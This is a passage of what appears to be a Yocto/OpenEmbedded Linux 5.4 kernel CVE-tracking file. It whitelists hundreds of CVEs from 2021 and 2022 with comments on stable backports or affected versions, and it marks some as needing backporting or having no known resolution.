6040# fixed-version: only affects 5.5rc1 onwards
6041CVE_CHECK_WHITELIST += "CVE-2021-47018"
6042
6043# fixed-version: only affects 5.12rc1 onwards
6044CVE_CHECK_WHITELIST += "CVE-2021-47019"
6045
6046# cpe-stable-backport: Backported in 5.4.119
6047CVE_CHECK_WHITELIST += "CVE-2021-47020"
6048
6049# fixed-version: only affects 5.12rc1 onwards
6050CVE_CHECK_WHITELIST += "CVE-2021-47021"
6051
6052# fixed-version: only affects 5.12rc1 onwards
6053CVE_CHECK_WHITELIST += "CVE-2021-47022"
6054
6055# fixed-version: only affects 5.10rc1 onwards
6056CVE_CHECK_WHITELIST += "CVE-2021-47023"
6057
6058# CVE-2021-47024 needs backporting (fixed from 5.13rc1)
6059
6060# fixed-version: only affects 5.12rc1 onwards
6061CVE_CHECK_WHITELIST += "CVE-2021-47025"
6062
6063# fixed-version: only affects 5.8rc1 onwards
6064CVE_CHECK_WHITELIST += "CVE-2021-47026"
6065
6066# fixed-version: only affects 5.12rc1 onwards
6067CVE_CHECK_WHITELIST += "CVE-2021-47027"
6068
6069# CVE-2021-47028 needs backporting (fixed from 5.13rc1)
6070
6071# fixed-version: only affects 5.12rc1 onwards
6072CVE_CHECK_WHITELIST += "CVE-2021-47029"
6073
6074# fixed-version: only affects 5.12rc1 onwards
6075CVE_CHECK_WHITELIST += "CVE-2021-47030"
6076
6077# fixed-version: only affects 5.12rc1 onwards
6078CVE_CHECK_WHITELIST += "CVE-2021-47031"
6079
6080# fixed-version: only affects 5.10rc1 onwards
6081CVE_CHECK_WHITELIST += "CVE-2021-47032"
6082
6083# fixed-version: only affects 5.10rc1 onwards
6084CVE_CHECK_WHITELIST += "CVE-2021-47033"
6085
6086# cpe-stable-backport: Backported in 5.4.119
6087CVE_CHECK_WHITELIST += "CVE-2021-47034"
6088
6089# fixed-version: only affects 5.6rc1 onwards
6090CVE_CHECK_WHITELIST += "CVE-2021-47035"
6091
6092# fixed-version: only affects 5.6rc1 onwards
6093CVE_CHECK_WHITELIST += "CVE-2021-47036"
6094
6095# fixed-version: only affects 5.10rc1 onwards
6096CVE_CHECK_WHITELIST += "CVE-2021-47037"
6097
6098# fixed-version: only affects 5.7rc1 onwards
6099CVE_CHECK_WHITELIST += "CVE-2021-47038"
6100
6101# fixed-version: only affects 5.11rc1 onwards
6102CVE_CHECK_WHITELIST += "CVE-2021-47039"
6103
6104# fixed-version: only affects 5.8rc1 onwards
6105CVE_CHECK_WHITELIST += "CVE-2021-47040"
6106
6107# cpe-stable-backport: Backported in 5.4.119
6108CVE_CHECK_WHITELIST += "CVE-2021-47041"
6109
6110# fixed-version: only affects 5.12rc1 onwards
6111CVE_CHECK_WHITELIST += "CVE-2021-47042"
6112
6113# fixed-version: only affects 5.5rc1 onwards
6114CVE_CHECK_WHITELIST += "CVE-2021-47043"
6115
6116# fixed-version: only affects 5.10rc1 onwards
6117CVE_CHECK_WHITELIST += "CVE-2021-47044"
6118
6119# fixed-version: only affects 5.11rc1 onwards
6120CVE_CHECK_WHITELIST += "CVE-2021-47045"
6121
6122# CVE-2021-47046 needs backporting (fixed from 5.13rc1)
6123
6124# fixed-version: only affects 5.10rc1 onwards
6125CVE_CHECK_WHITELIST += "CVE-2021-47047"
6126
6127# fixed-version: only affects 5.10rc1 onwards
6128CVE_CHECK_WHITELIST += "CVE-2021-47048"
6129
6130# CVE-2021-47049 needs backporting (fixed from 5.13rc1)
6131
6132# fixed-version: only affects 5.9rc1 onwards
6133CVE_CHECK_WHITELIST += "CVE-2021-47050"
6134
6135# cpe-stable-backport: Backported in 5.4.119
6136CVE_CHECK_WHITELIST += "CVE-2021-47051"
6137
6138# CVE-2021-47052 needs backporting (fixed from 5.13rc1)
6139
6140# fixed-version: only affects 5.10rc1 onwards
6141CVE_CHECK_WHITELIST += "CVE-2021-47053"
6142
6143# cpe-stable-backport: Backported in 5.4.119
6144CVE_CHECK_WHITELIST += "CVE-2021-47054"
6145
6146# fixed-version: only affects 5.9rc1 onwards
6147CVE_CHECK_WHITELIST += "CVE-2021-47055"
6148
6149# cpe-stable-backport: Backported in 5.4.119
6150CVE_CHECK_WHITELIST += "CVE-2021-47056"
6151
6152# fixed-version: only affects 5.10rc1 onwards
6153CVE_CHECK_WHITELIST += "CVE-2021-47057"
6154
6155# fixed-version: only affects 5.11rc3 onwards
6156CVE_CHECK_WHITELIST += "CVE-2021-47058"
6157
6158# CVE-2021-47059 needs backporting (fixed from 5.13rc1)
6159
6160# fixed-version: only affects 5.9rc5 onwards
6161CVE_CHECK_WHITELIST += "CVE-2021-47060"
6162
6163# fixed-version: only affects 5.9rc5 onwards
6164CVE_CHECK_WHITELIST += "CVE-2021-47061"
6165
6166# fixed-version: only affects 5.11rc1 onwards
6167CVE_CHECK_WHITELIST += "CVE-2021-47062"
6168
6169# CVE-2021-47063 needs backporting (fixed from 5.13rc1)
6170
6171# fixed-version: only affects 5.10rc1 onwards
6172CVE_CHECK_WHITELIST += "CVE-2021-47064"
6173
6174# cpe-stable-backport: Backported in 5.4.119
6175CVE_CHECK_WHITELIST += "CVE-2021-47065"
6176
6177# fixed-version: only affects 5.10rc1 onwards
6178CVE_CHECK_WHITELIST += "CVE-2021-47066"
6179
6180# fixed-version: only affects 5.5rc1 onwards
6181CVE_CHECK_WHITELIST += "CVE-2021-47067"
6182
6183# fixed-version: only affects 5.12rc7 onwards
6184CVE_CHECK_WHITELIST += "CVE-2021-47068"
6185
6186# fixed-version: only affects 5.6rc1 onwards
6187CVE_CHECK_WHITELIST += "CVE-2021-47069"
6188
6189# CVE-2021-47070 needs backporting (fixed from 5.13rc3)
6190
6191# cpe-stable-backport: Backported in 5.4.122
6192CVE_CHECK_WHITELIST += "CVE-2021-47071"
6193
6194# fixed-version: only affects 5.12rc1 onwards
6195CVE_CHECK_WHITELIST += "CVE-2021-47072"
6196
6197# cpe-stable-backport: Backported in 5.4.122
6198CVE_CHECK_WHITELIST += "CVE-2021-47073"
6199
6200# CVE-2021-47074 needs backporting (fixed from 5.13rc3)
6201
6202# CVE-2021-47075 needs backporting (fixed from 5.13rc3)
6203
6204# CVE-2021-47076 needs backporting (fixed from 5.13rc3)
6205
6206# CVE-2021-47077 needs backporting (fixed from 5.13rc3)
6207
6208# cpe-stable-backport: Backported in 5.4.122
6209CVE_CHECK_WHITELIST += "CVE-2021-47078"
6210
6211# fixed-version: only affects 5.12rc1 onwards
6212CVE_CHECK_WHITELIST += "CVE-2021-47079"
6213
6214# fixed-version: only affects 5.10rc1 onwards
6215CVE_CHECK_WHITELIST += "CVE-2021-47080"
6216
6217# fixed-version: only affects 5.12rc1 onwards
6218CVE_CHECK_WHITELIST += "CVE-2021-47081"
6219
6220# cpe-stable-backport: Backported in 5.4.240
6221CVE_CHECK_WHITELIST += "CVE-2021-47082"
6222
6223# cpe-stable-backport: Backported in 5.4.169
6224CVE_CHECK_WHITELIST += "CVE-2021-47083"
6225
6226# cpe-stable-backport: Backported in 5.4.169
6227CVE_CHECK_WHITELIST += "CVE-2021-47086"
6228
6229# fixed-version: only affects 5.14rc5 onwards
6230CVE_CHECK_WHITELIST += "CVE-2021-47087"
6231
6232# fixed-version: only affects 5.15rc1 onwards
6233CVE_CHECK_WHITELIST += "CVE-2021-47088"
6234
6235# fixed-version: only affects 5.12rc1 onwards
6236CVE_CHECK_WHITELIST += "CVE-2021-47089"
6237
6238# fixed-version: only affects 5.10rc1 onwards
6239CVE_CHECK_WHITELIST += "CVE-2021-47090"
6240
6241# fixed-version: only affects 5.10rc1 onwards
6242CVE_CHECK_WHITELIST += "CVE-2021-47091"
6243
6244# fixed-version: only affects 5.15rc4 onwards
6245CVE_CHECK_WHITELIST += "CVE-2021-47092"
6246
6247# fixed-version: only affects 5.9 onwards
6248CVE_CHECK_WHITELIST += "CVE-2021-47093"
6249
6250# fixed-version: only affects 5.10rc1 onwards
6251CVE_CHECK_WHITELIST += "CVE-2021-47094"
6252
6253# cpe-stable-backport: Backported in 5.4.169
6254CVE_CHECK_WHITELIST += "CVE-2021-47095"
6255
6256# fixed-version: only affects 5.15rc4 onwards
6257CVE_CHECK_WHITELIST += "CVE-2021-47096"
6258
6259# fixed-version: only affects 5.11rc1 onwards
6260CVE_CHECK_WHITELIST += "CVE-2021-47097"
6261
6262# fixed-version: only affects 5.14rc1 onwards
6263CVE_CHECK_WHITELIST += "CVE-2021-47098"
6264
6265# fixed-version: only affects 5.13rc1 onwards
6266CVE_CHECK_WHITELIST += "CVE-2021-47099"
6267
6268# cpe-stable-backport: Backported in 5.4.169
6269CVE_CHECK_WHITELIST += "CVE-2021-47100"
6270
6271# CVE-2021-47101 needs backporting (fixed from 5.16rc7)
6272
6273# fixed-version: only affects 5.14rc1 onwards
6274CVE_CHECK_WHITELIST += "CVE-2021-47102"
6275
6276# cpe-stable-backport: Backported in 5.4.220
6277CVE_CHECK_WHITELIST += "CVE-2021-47103"
6278
6279# fixed-version: only affects 5.15 onwards
6280CVE_CHECK_WHITELIST += "CVE-2021-47104"
6281
6282# fixed-version: only affects 5.5rc1 onwards
6283CVE_CHECK_WHITELIST += "CVE-2021-47105"
6284
6285# fixed-version: only affects 5.13rc1 onwards
6286CVE_CHECK_WHITELIST += "CVE-2021-47106"
6287
6288# fixed-version: only affects 5.13rc1 onwards
6289CVE_CHECK_WHITELIST += "CVE-2021-47107"
6290
6291# fixed-version: only affects 5.14rc1 onwards
6292CVE_CHECK_WHITELIST += "CVE-2021-47108"
6293
6294# cpe-stable-backport: Backported in 5.4.125
6295CVE_CHECK_WHITELIST += "CVE-2021-47109"
6296
6297# cpe-stable-backport: Backported in 5.4.125
6298CVE_CHECK_WHITELIST += "CVE-2021-47110"
6299
6300# fixed-version: only affects 5.5rc1 onwards
6301CVE_CHECK_WHITELIST += "CVE-2021-47111"
6302
6303# cpe-stable-backport: Backported in 5.4.125
6304CVE_CHECK_WHITELIST += "CVE-2021-47112"
6305
6306# CVE-2021-47113 needs backporting (fixed from 5.13rc5)
6307
6308# cpe-stable-backport: Backported in 5.4.125
6309CVE_CHECK_WHITELIST += "CVE-2021-47114"
6310
6311# CVE-2021-47116 needs backporting (fixed from 5.13rc5)
6312
6313# cpe-stable-backport: Backported in 5.4.125
6314CVE_CHECK_WHITELIST += "CVE-2021-47117"
6315
6316# cpe-stable-backport: Backported in 5.4.125
6317CVE_CHECK_WHITELIST += "CVE-2021-47118"
6318
6319# CVE-2021-47119 needs backporting (fixed from 5.13rc5)
6320
6321# cpe-stable-backport: Backported in 5.4.125
6322CVE_CHECK_WHITELIST += "CVE-2021-47120"
6323
6324# cpe-stable-backport: Backported in 5.4.125
6325CVE_CHECK_WHITELIST += "CVE-2021-47121"
6326
6327# cpe-stable-backport: Backported in 5.4.125
6328CVE_CHECK_WHITELIST += "CVE-2021-47122"
6329
6330# fixed-version: only affects 5.11rc1 onwards
6331CVE_CHECK_WHITELIST += "CVE-2021-47123"
6332
6333# CVE-2021-47124 needs backporting (fixed from 5.13rc2)
6334
6335# CVE-2021-47125 needs backporting (fixed from 5.13rc5)
6336
6337# cpe-stable-backport: Backported in 5.4.125
6338CVE_CHECK_WHITELIST += "CVE-2021-47126"
6339
6340# fixed-version: only affects 5.12rc1 onwards
6341CVE_CHECK_WHITELIST += "CVE-2021-47127"
6342
6343# CVE-2021-47128 needs backporting (fixed from 5.13rc5)
6344
6345# cpe-stable-backport: Backported in 5.4.125
6346CVE_CHECK_WHITELIST += "CVE-2021-47129"
6347
6348# fixed-version: only affects 5.8rc1 onwards
6349CVE_CHECK_WHITELIST += "CVE-2021-47130"
6350
6351# CVE-2021-47131 needs backporting (fixed from 5.13rc5)
6352
6353# fixed-version: only affects 5.12rc1 onwards
6354CVE_CHECK_WHITELIST += "CVE-2021-47132"
6355
6356# CVE-2021-47133 needs backporting (fixed from 5.13rc5)
6357
6358# fixed-version: only affects 5.10rc1 onwards
6359CVE_CHECK_WHITELIST += "CVE-2021-47134"
6360
6361# CVE-2021-47135 needs backporting (fixed from 5.13rc5)
6362
6363# CVE-2021-47136 needs backporting (fixed from 5.13rc4)
6364
6365# cpe-stable-backport: Backported in 5.4.124
6366CVE_CHECK_WHITELIST += "CVE-2021-47137"
6367
6368# cpe-stable-backport: Backported in 5.4.124
6369CVE_CHECK_WHITELIST += "CVE-2021-47138"
6370
6371# fixed-version: only affects 5.6rc1 onwards
6372CVE_CHECK_WHITELIST += "CVE-2021-47139"
6373
6374# CVE-2021-47140 needs backporting (fixed from 5.13rc4)
6375
6376# cpe-stable-backport: Backported in 5.4.124
6377CVE_CHECK_WHITELIST += "CVE-2021-47141"
6378
6379# cpe-stable-backport: Backported in 5.4.124
6380CVE_CHECK_WHITELIST += "CVE-2021-47142"
6381
6382# CVE-2021-47143 needs backporting (fixed from 5.13rc4)
6383
6384# cpe-stable-backport: Backported in 5.4.124
6385CVE_CHECK_WHITELIST += "CVE-2021-47144"
6386
6387# cpe-stable-backport: Backported in 5.4.124
6388CVE_CHECK_WHITELIST += "CVE-2021-47145"
6389
6390# cpe-stable-backport: Backported in 5.4.124
6391CVE_CHECK_WHITELIST += "CVE-2021-47146"
6392
6393# CVE-2021-47147 needs backporting (fixed from 5.13rc4)
6394
6395# fixed-version: only affects 5.12rc1 onwards
6396CVE_CHECK_WHITELIST += "CVE-2021-47148"
6397
6398# cpe-stable-backport: Backported in 5.4.124
6399CVE_CHECK_WHITELIST += "CVE-2021-47149"
6400
6401# cpe-stable-backport: Backported in 5.4.124
6402CVE_CHECK_WHITELIST += "CVE-2021-47150"
6403
6404# CVE-2021-47151 needs backporting (fixed from 5.13rc4)
6405
6406# fixed-version: only affects 5.7rc1 onwards
6407CVE_CHECK_WHITELIST += "CVE-2021-47152"
6408
6409# cpe-stable-backport: Backported in 5.4.124
6410CVE_CHECK_WHITELIST += "CVE-2021-47153"
6411
6412# CVE-2021-47158 needs backporting (fixed from 5.13rc4)
6413
6414# cpe-stable-backport: Backported in 5.4.124
6415CVE_CHECK_WHITELIST += "CVE-2021-47159"
6416
6417# cpe-stable-backport: Backported in 5.4.124
6418CVE_CHECK_WHITELIST += "CVE-2021-47160"
6419
6420# cpe-stable-backport: Backported in 5.4.124
6421CVE_CHECK_WHITELIST += "CVE-2021-47161"
6422
6423# cpe-stable-backport: Backported in 5.4.124
6424CVE_CHECK_WHITELIST += "CVE-2021-47162"
6425
6426# cpe-stable-backport: Backported in 5.4.124
6427CVE_CHECK_WHITELIST += "CVE-2021-47163"
6428
6429# fixed-version: only affects 5.8rc1 onwards
6430CVE_CHECK_WHITELIST += "CVE-2021-47164"
6431
6432# cpe-stable-backport: Backported in 5.4.124
6433CVE_CHECK_WHITELIST += "CVE-2021-47165"
6434
6435# cpe-stable-backport: Backported in 5.4.124
6436CVE_CHECK_WHITELIST += "CVE-2021-47166"
6437
6438# cpe-stable-backport: Backported in 5.4.124
6439CVE_CHECK_WHITELIST += "CVE-2021-47167"
6440
6441# cpe-stable-backport: Backported in 5.4.124
6442CVE_CHECK_WHITELIST += "CVE-2021-47168"
6443
6444# cpe-stable-backport: Backported in 5.4.124
6445CVE_CHECK_WHITELIST += "CVE-2021-47169"
6446
6447# cpe-stable-backport: Backported in 5.4.124
6448CVE_CHECK_WHITELIST += "CVE-2021-47170"
6449
6450# cpe-stable-backport: Backported in 5.4.124
6451CVE_CHECK_WHITELIST += "CVE-2021-47171"
6452
6453# cpe-stable-backport: Backported in 5.4.124
6454CVE_CHECK_WHITELIST += "CVE-2021-47172"
6455
6456# cpe-stable-backport: Backported in 5.4.124
6457CVE_CHECK_WHITELIST += "CVE-2021-47173"
6458
6459# fixed-version: only affects 5.7rc1 onwards
6460CVE_CHECK_WHITELIST += "CVE-2021-47174"
6461
6462# CVE-2021-47175 needs backporting (fixed from 5.13rc4)
6463
6464# fixed-version: only affects 5.11rc1 onwards
6465CVE_CHECK_WHITELIST += "CVE-2021-47176"
6466
6467# cpe-stable-backport: Backported in 5.4.124
6468CVE_CHECK_WHITELIST += "CVE-2021-47177"
6469
6470# fixed-version: only affects 5.11rc1 onwards
6471CVE_CHECK_WHITELIST += "CVE-2021-47178"
6472
6473# cpe-stable-backport: Backported in 5.4.124
6474CVE_CHECK_WHITELIST += "CVE-2021-47179"
6475
6476# cpe-stable-backport: Backported in 5.4.123
6477CVE_CHECK_WHITELIST += "CVE-2021-47180"
6478
6479# cpe-stable-backport: Backported in 5.4.184
6480CVE_CHECK_WHITELIST += "CVE-2022-0001"
6481
6482# cpe-stable-backport: Backported in 5.4.184
6483CVE_CHECK_WHITELIST += "CVE-2022-0002"
6484
6485# CVE-2022-0168 needs backporting (fixed from 5.18rc1)
6486
6487# fixed-version: only affects 5.10rc1 onwards
6488CVE_CHECK_WHITELIST += "CVE-2022-0171"
6489
6490# cpe-stable-backport: Backported in 5.4.173
6491CVE_CHECK_WHITELIST += "CVE-2022-0185"
6492
6493# fixed-version: only affects 5.12rc1 onwards
6494CVE_CHECK_WHITELIST += "CVE-2022-0264"
6495
6496# fixed-version: only affects 5.9rc1 onwards
6497CVE_CHECK_WHITELIST += "CVE-2022-0286"
6498
6499# cpe-stable-backport: Backported in 5.4.155
6500CVE_CHECK_WHITELIST += "CVE-2022-0322"
6501
6502# cpe-stable-backport: Backported in 5.4.175
6503CVE_CHECK_WHITELIST += "CVE-2022-0330"
6504
6505# CVE-2022-0382 needs backporting (fixed from 5.16)
6506
6507# CVE-2022-0400 has no known resolution
6508
6509# fixed-version: only affects 5.16rc1 onwards
6510CVE_CHECK_WHITELIST += "CVE-2022-0433"
6511
6512# cpe-stable-backport: Backported in 5.4.179
6513CVE_CHECK_WHITELIST += "CVE-2022-0435"
6514
6515# CVE-2022-0480 needs backporting (fixed from 5.15rc1)
6516
6517# cpe-stable-backport: Backported in 5.4.179
6518CVE_CHECK_WHITELIST += "CVE-2022-0487"
6519
6520# cpe-stable-backport: Backported in 5.4.177
6521CVE_CHECK_WHITELIST += "CVE-2022-0492"
6522
6523# cpe-stable-backport: Backported in 5.4.193
6524CVE_CHECK_WHITELIST += "CVE-2022-0494"
6525
6526# fixed-version: only affects 5.10rc1 onwards
6527CVE_CHECK_WHITELIST += "CVE-2022-0500"
6528
6529# fixed-version: only affects 5.7rc1 onwards
6530CVE_CHECK_WHITELIST += "CVE-2022-0516"
6531
6532# cpe-stable-backport: Backported in 5.4.176
6533CVE_CHECK_WHITELIST += "CVE-2022-0617"
6534
6535# cpe-stable-backport: Backported in 5.4.156
6536CVE_CHECK_WHITELIST += "CVE-2022-0644"
6537
6538# fixed-version: only affects 5.17rc1 onwards
6539CVE_CHECK_WHITELIST += "CVE-2022-0646"
6540
6541# fixed-version: only affects 5.13rc1 onwards
6542CVE_CHECK_WHITELIST += "CVE-2022-0742"
6543
6544# cpe-stable-backport: Backported in 5.4.53
6545CVE_CHECK_WHITELIST += "CVE-2022-0812"
6546
6547# fixed-version: only affects 5.8rc1 onwards
6548CVE_CHECK_WHITELIST += "CVE-2022-0847"
6549
6550# cpe-stable-backport: Backported in 5.4.132
6551CVE_CHECK_WHITELIST += "CVE-2022-0850"
6552
6553# fixed-version: only affects 5.17rc6 onwards
6554CVE_CHECK_WHITELIST += "CVE-2022-0854"
6555
6556# fixed-version: only affects 5.8rc1 onwards
6557CVE_CHECK_WHITELIST += "CVE-2022-0995"
6558
6559# fixed-version: only affects 5.7rc1 onwards
6560CVE_CHECK_WHITELIST += "CVE-2022-0998"
6561
6562# cpe-stable-backport: Backported in 5.4.185
6563CVE_CHECK_WHITELIST += "CVE-2022-1011"
6564
6565# cpe-stable-backport: Backported in 5.4.197
6566CVE_CHECK_WHITELIST += "CVE-2022-1012"
6567
6568# fixed-version: only affects 5.12rc1 onwards
6569CVE_CHECK_WHITELIST += "CVE-2022-1015"
6570
6571# cpe-stable-backport: Backported in 5.4.188
6572CVE_CHECK_WHITELIST += "CVE-2022-1016"
6573
6574# fixed-version: only affects 5.12rc3 onwards
6575CVE_CHECK_WHITELIST += "CVE-2022-1043"
6576
6577# cpe-stable-backport: Backported in 5.4.193
6578CVE_CHECK_WHITELIST += "CVE-2022-1048"
6579
6580# cpe-stable-backport: Backported in 5.4.177
6581CVE_CHECK_WHITELIST += "CVE-2022-1055"
6582
6583# CVE-2022-1116 has no known resolution
6584
6585# cpe-stable-backport: Backported in 5.4.189
6586CVE_CHECK_WHITELIST += "CVE-2022-1158"
6587
6588# cpe-stable-backport: Backported in 5.4.198
6589CVE_CHECK_WHITELIST += "CVE-2022-1184"
6590
6591# cpe-stable-backport: Backported in 5.4.169
6592CVE_CHECK_WHITELIST += "CVE-2022-1195"
6593
6594# cpe-stable-backport: Backported in 5.4.189
6595CVE_CHECK_WHITELIST += "CVE-2022-1198"
6596
6597# cpe-stable-backport: Backported in 5.4.185
6598CVE_CHECK_WHITELIST += "CVE-2022-1199"
6599
6600# cpe-stable-backport: Backported in 5.4.190
6601CVE_CHECK_WHITELIST += "CVE-2022-1204"
6602
6603# fixed-version: only affects 5.17rc4 onwards
6604CVE_CHECK_WHITELIST += "CVE-2022-1205"
6605
6606# CVE-2022-1247 has no known resolution
6607
6608# CVE-2022-1263 needs backporting (fixed from 5.18rc3)
6609
6610# CVE-2022-1280 needs backporting (fixed from 5.15rc1)
6611
6612# cpe-stable-backport: Backported in 5.4.189
6613CVE_CHECK_WHITELIST += "CVE-2022-1353"
6614
6615# cpe-stable-backport: Backported in 5.4.21
6616CVE_CHECK_WHITELIST += "CVE-2022-1419"
6617
6618# cpe-stable-backport: Backported in 5.4.208
6619CVE_CHECK_WHITELIST += "CVE-2022-1462"
6620
6621# fixed-version: only affects 5.11rc1 onwards
6622CVE_CHECK_WHITELIST += "CVE-2022-1508"
6623
6624# fixed-version: only affects 5.7rc5 onwards
6625CVE_CHECK_WHITELIST += "CVE-2022-1516"
6626
6627# fixed-version: only affects 5.12rc1 onwards
6628CVE_CHECK_WHITELIST += "CVE-2022-1651"
6629
6630# cpe-stable-backport: Backported in 5.4.196
6631CVE_CHECK_WHITELIST += "CVE-2022-1652"
6632
6633# fixed-version: only affects 5.11rc1 onwards
6634CVE_CHECK_WHITELIST += "CVE-2022-1671"
6635
6636# fixed-version: Fixed after version 4.20rc1
6637CVE_CHECK_WHITELIST += "CVE-2022-1678"
6638
6639# cpe-stable-backport: Backported in 5.4.211
6640CVE_CHECK_WHITELIST += "CVE-2022-1679"
6641
6642# cpe-stable-backport: Backported in 5.4.196
6643CVE_CHECK_WHITELIST += "CVE-2022-1729"
6644
6645# cpe-stable-backport: Backported in 5.4.193
6646CVE_CHECK_WHITELIST += "CVE-2022-1734"
6647
6648# fixed-version: only affects 5.10rc1 onwards
6649CVE_CHECK_WHITELIST += "CVE-2022-1786"
6650
6651# CVE-2022-1789 needs backporting (fixed from 5.18)
6652
6653# cpe-stable-backport: Backported in 5.4.192
6654CVE_CHECK_WHITELIST += "CVE-2022-1836"
6655
6656# fixed-version: only affects 5.12rc1 onwards
6657CVE_CHECK_WHITELIST += "CVE-2022-1852"
6658
6659# fixed-version: only affects 5.17rc8 onwards
6660CVE_CHECK_WHITELIST += "CVE-2022-1882"
6661
6662# fixed-version: only affects 5.15rc1 onwards
6663CVE_CHECK_WHITELIST += "CVE-2022-1943"
6664
6665# cpe-stable-backport: Backported in 5.4.198
6666CVE_CHECK_WHITELIST += "CVE-2022-1966"
6667
6668# fixed-version: only affects 5.6rc1 onwards
6669CVE_CHECK_WHITELIST += "CVE-2022-1972"
6670
6671# fixed-version: only affects 5.15rc1 onwards
6672CVE_CHECK_WHITELIST += "CVE-2022-1973"
6673
6674# cpe-stable-backport: Backported in 5.4.193
6675CVE_CHECK_WHITELIST += "CVE-2022-1974"
6676
6677# cpe-stable-backport: Backported in 5.4.193
6678CVE_CHECK_WHITELIST += "CVE-2022-1975"
6679
6680# fixed-version: only affects 5.18rc2 onwards
6681CVE_CHECK_WHITELIST += "CVE-2022-1976"
6682
6683# fixed-version: only affects 5.13rc7 onwards
6684CVE_CHECK_WHITELIST += "CVE-2022-1998"
6685
6686# cpe-stable-backport: Backported in 5.4.181
6687CVE_CHECK_WHITELIST += "CVE-2022-20008"
6688
6689# cpe-stable-backport: Backported in 5.4.165
6690CVE_CHECK_WHITELIST += "CVE-2022-20132"
6691
6692# cpe-stable-backport: Backported in 5.4.145
6693CVE_CHECK_WHITELIST += "CVE-2022-20141"
6694
6695# CVE-2022-20148 needs backporting (fixed from 5.16rc1)
6696
6697# fixed-version: only affects 5.12rc1 onwards
6698CVE_CHECK_WHITELIST += "CVE-2022-20153"
6699
6700# cpe-stable-backport: Backported in 5.4.170
6701CVE_CHECK_WHITELIST += "CVE-2022-20154"
6702
6703# cpe-stable-backport: Backported in 5.4.187
6704CVE_CHECK_WHITELIST += "CVE-2022-20158"
6705
6706# CVE-2022-20166 needs backporting (fixed from 5.10rc1)
6707
6708# cpe-stable-backport: Backported in 5.4.187
6709CVE_CHECK_WHITELIST += "CVE-2022-20368"
6710
6711# cpe-stable-backport: Backported in 5.4.210
6712CVE_CHECK_WHITELIST += "CVE-2022-20369"
6713
6714# fixed-version: only affects 5.10rc1 onwards
6715CVE_CHECK_WHITELIST += "CVE-2022-20409"
6716
6717# cpe-stable-backport: Backported in 5.4.213
6718CVE_CHECK_WHITELIST += "CVE-2022-20421"
6719
6720# cpe-stable-backport: Backported in 5.4.211
6721CVE_CHECK_WHITELIST += "CVE-2022-20422"
6722
6723# fixed-version: only affects 5.17rc4 onwards
6724CVE_CHECK_WHITELIST += "CVE-2022-20423"
6725
6726# CVE-2022-20424 needs backporting (fixed from 5.12rc1)
6727
6728# cpe-stable-backport: Backported in 5.4.63
6729CVE_CHECK_WHITELIST += "CVE-2022-20565"
6730
6731# cpe-stable-backport: Backported in 5.4.209
6732CVE_CHECK_WHITELIST += "CVE-2022-20566"
6733
6734# fixed-version: Fixed after version 4.16rc5
6735CVE_CHECK_WHITELIST += "CVE-2022-20567"
6736
6737# fixed-version: only affects 5.7rc4 onwards
6738CVE_CHECK_WHITELIST += "CVE-2022-20568"
6739
6740# cpe-stable-backport: Backported in 5.4.197
6741CVE_CHECK_WHITELIST += "CVE-2022-20572"
6742
6743# fixed-version: only affects 5.6rc1 onwards
6744CVE_CHECK_WHITELIST += "CVE-2022-2078"
6745
6746# cpe-stable-backport: Backported in 5.4.199
6747CVE_CHECK_WHITELIST += "CVE-2022-21123"
6748
6749# cpe-stable-backport: Backported in 5.4.199
6750CVE_CHECK_WHITELIST += "CVE-2022-21125"
6751
6752# cpe-stable-backport: Backported in 5.4.199
6753CVE_CHECK_WHITELIST += "CVE-2022-21166"
6754
6755# fixed-version: Fixed after version 4.20
6756CVE_CHECK_WHITELIST += "CVE-2022-21385"
6757
6758# cpe-stable-backport: Backported in 5.4.197
6759CVE_CHECK_WHITELIST += "CVE-2022-21499"
6760
6761# cpe-stable-backport: Backported in 5.4.208
6762CVE_CHECK_WHITELIST += "CVE-2022-21505"
6763
6764# cpe-stable-backport: Backported in 5.4.211
6765CVE_CHECK_WHITELIST += "CVE-2022-2153"
6766
6767# fixed-version: only affects 5.8rc1 onwards
6768CVE_CHECK_WHITELIST += "CVE-2022-2196"
6769
6770# CVE-2022-2209 has no known resolution
6771
6772# cpe-stable-backport: Backported in 5.4.175
6773CVE_CHECK_WHITELIST += "CVE-2022-22942"
6774
6775# cpe-stable-backport: Backported in 5.4.184
6776CVE_CHECK_WHITELIST += "CVE-2022-23036"
6777
6778# cpe-stable-backport: Backported in 5.4.184
6779CVE_CHECK_WHITELIST += "CVE-2022-23037"
6780
6781# cpe-stable-backport: Backported in 5.4.184
6782CVE_CHECK_WHITELIST += "CVE-2022-23038"
6783
6784# cpe-stable-backport: Backported in 5.4.184
6785CVE_CHECK_WHITELIST += "CVE-2022-23039"
6786
6787# cpe-stable-backport: Backported in 5.4.184
6788CVE_CHECK_WHITELIST += "CVE-2022-23040"
6789
6790# cpe-stable-backport: Backported in 5.4.184
6791CVE_CHECK_WHITELIST += "CVE-2022-23041"
6792
6793# cpe-stable-backport: Backported in 5.4.184
6794CVE_CHECK_WHITELIST += "CVE-2022-23042"
6795
6796# fixed-version: only affects 5.15rc1 onwards
6797CVE_CHECK_WHITELIST += "CVE-2022-2308"
6798
6799# cpe-stable-backport: Backported in 5.4.204
6800CVE_CHECK_WHITELIST += "CVE-2022-2318"
6801
6802# CVE-2022-23222 needs backporting (fixed from 5.17rc1)
6803
6804# CVE-2022-2327 needs backporting (fixed from 5.12rc1)
6805
6806# cpe-stable-backport: Backported in 5.4.189
6807CVE_CHECK_WHITELIST += "CVE-2022-2380"
6808
6809# cpe-stable-backport: Backported in 5.4.217
6810CVE_CHECK_WHITELIST += "CVE-2022-23816"
6811
6812# CVE-2022-23825 has no known resolution
6813
6814# cpe-stable-backport: Backported in 5.4.184
6815CVE_CHECK_WHITELIST += "CVE-2022-23960"
6816
6817# fixed-version: only affects 5.14rc1 onwards
6818CVE_CHECK_WHITELIST += "CVE-2022-24122"
6819
6820# cpe-stable-backport: Backported in 5.4.176
6821CVE_CHECK_WHITELIST += "CVE-2022-24448"
6822
6823# cpe-stable-backport: Backported in 5.4.183
6824CVE_CHECK_WHITELIST += "CVE-2022-24958"
6825
6826# cpe-stable-backport: Backported in 5.4.176
6827CVE_CHECK_WHITELIST += "CVE-2022-24959"
6828
6829# cpe-stable-backport: Backported in 5.4.197
6830CVE_CHECK_WHITELIST += "CVE-2022-2503"
6831
6832# cpe-stable-backport: Backported in 5.4.180
6833CVE_CHECK_WHITELIST += "CVE-2022-25258"
6834
6835# CVE-2022-25265 has no known resolution
6836
6837# cpe-stable-backport: Backported in 5.4.180
6838CVE_CHECK_WHITELIST += "CVE-2022-25375"
6839
6840# cpe-stable-backport: Backported in 5.4.182
